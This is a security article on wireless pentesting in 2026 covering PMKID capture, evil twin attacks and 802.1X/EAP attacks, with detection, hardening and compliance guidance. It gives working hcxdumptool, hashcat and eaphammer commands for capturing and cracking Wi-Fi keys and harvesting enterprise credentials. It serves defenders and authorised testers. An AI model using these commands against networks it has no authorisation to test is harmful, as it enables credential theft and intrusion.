Wireless Pentest in 2026: WPA3, PMKID Attacks, Evil Twin

Last updated: April 26, 2026

Wireless pentesting in 2026 has shifted. WPA2 is being phased out in enterprise; WPA3 is the new floor; corporate Wi-Fi increasingly uses 802.1X with EAP-TLS. Yet the practical attack surface remains substantial — WPA3 transition mode, weak PSKs, captive portal abuse, evil twin attacks, PMKID extraction. This article covers the wireless attacks that work in 2026, the toolchain (hcxdumptool, hashcat, airgeddon, eaphammer), and the enterprise wireless hardening that closes them.

The state of wireless security

WPA3 introduces SAE (Simultaneous Authentication of Equals) replacing the WPA2 4-way handshake. SAE makes offline cracking harder. But:

• WPA3 transition mode — networks supporting both WPA2 and WPA3 simultaneously. Attacker forces clients to WPA2; cracks the WPA2 handshake; bypasses WPA3 entirely.
• Dragonblood vulnerabilities (CVE-2019-9494/9495/9496/9497/9498/9499) — side-channel attacks against SAE allowed offline password recovery on early WPA3 implementations. Largely patched but legacy hardware persists.
• Weak SAE passwords — even WPA3 falls to dictionary attacks if the PSK is “Welcome2024” or similar.
• EAP misconfiguration in 802.1X enterprise networks remains common — relay attacks, downgrade to weaker auth methods.

The PMKID attack (still works)

PMKID extraction is the modern WPA2 attack that doesn’t require capturing a full handshake. The Access Point’s PMKID is included in the first message of the 4-way handshake; attacker requests it directly.

# Capture PMKID:
sudo hcxdumptool -i wlan0 --enable-status=1 -o capture.pcapng
# Convert for cracking:
hcxpcapngtool -o hash.hc22000 capture.pcapng
# Crack with hashcat:
hashcat -m 22000 hash.hc22000 rockyou.txt --rules-file best64.rule

If the PSK is in any commonly-known dictionary (rockyou, hashes.org), it cracks. Indian SOHO routers ship with default passwords like admin123, ISP routers use defaultpass or similar — extremely vulnerable.

Evil twin / captive portal attack

Set up a rogue AP with the same SSID as the target. Clients (especially those configured with “auto-connect to known networks”) associate to your AP. Capture the WPA2/WPA3 attempt or serve a captive portal that prompts for the password.

Tools: airgeddon, fluxion, wifipumpkin3. Modern variants serve a fake “router firmware update” page that looks like the actual brand of the target.

WPA Enterprise (802.1X) attacks

Corporate Wi-Fi typically uses EAP-TLS (certificate-based) or EAP-PEAP/MSCHAPv2 (password-based). Each has attacks.

EAP-TLS

If the client doesn’t validate server certificate properly:

# With eaphammer:
eaphammer -i wlan0 --essid CORP-WIFI --auth wpa-eap --creds
# Sets up rogue RADIUS accepting any cert
# Captures EAP credentials when clients connect

EAP-PEAP/MSCHAPv2

The MSCHAPv2 challenge can be cracked offline:

# Capture challenge/response with eaphammer
# Crack with asleap or hashcat (mode 5500)
hashcat -m 5500 mschap.hash rockyou.txt

Mitigation: enforce server certificate validation on all clients, use EAP-TLS with mutual auth.

Detection — what works

• WIPS (Wireless Intrusion Prevention System) — Cisco Meraki, Aruba ClearPass, dedicated WIPS sensors. Detect rogue APs by SSID/BSSID anomalies.
• Spectrum analysis — periodic walks of facility with a wireless analyzer (Ekahau, NetSpot, Acrylic Wi-Fi Analyzer) — find unauthorised APs.
• Client behaviour anomalies — clients deauthenticating and reassociating frequently can indicate evil-twin attack.
• RADIUS log analysis — failed authentications, unusual EAP versions, unknown supplicants.

Hardening for enterprise wireless

• WPA3 only (no transition mode) where client base supports it
• Strong PSKs (32+ characters, random) for guest / personal-mode networks
• EAP-TLS for enterprise auth, not PEAP
• Server certificate validation enforced on every client (MDM-pushed Wi-Fi profiles)
• Rotate Wi-Fi credentials annually
• Segregate wireless guests in separate VLAN with strict egress controls
• WIPS deployed and monitored
• Disable Wi-Fi Protected Setup (WPS) — historically vulnerable to PIN bruteforce

How to find your next wireless finding

For attackers (legitimate red-team):

• Walk the perimeter with hcxdumptool. Capture PMKIDs from every visible AP. Crack offline.
• For corporate networks, run eaphammer to test client cert validation.
• Test guest network for VLAN escape — can you reach corporate IPs from the guest segment?

For defenders:

• Audit Wi-Fi profile pushed via MDM — does it require server cert validation?
• Run a wireless walk-around quarterly. Document AP inventory; investigate unknown SSIDs / BSSIDs.
• Test guest segregation — provision a guest credential and try to reach internal hosts.

Compliance angle

• RBI Cyber Framework — wireless security requirements explicitly cover EAP-TLS adoption and WIPS.
• SEBI CSCRF — wireless infrastructure for Q-RE / MII has specific hardening expectations.
• PCI-DSS Requirement 4 / 11.1 — wireless protection of cardholder data; rogue AP detection.
• ISO 27001:2022 A.8.21, A.8.22 — network security and segregation.

The takeaway

Wireless attacks in 2026 favour the patient attacker. Capture PMKIDs from the parking lot; crack offline at home; return with credentials. The defender’s leverage is in cert-based authentication, strong PSKs, and continuous wireless monitoring. Run hcxdumptool against your own perimeter; the resulting hash is your weakest-link PSK. If it cracks within an hour against rockyou, every WPA2 client on your network is at risk.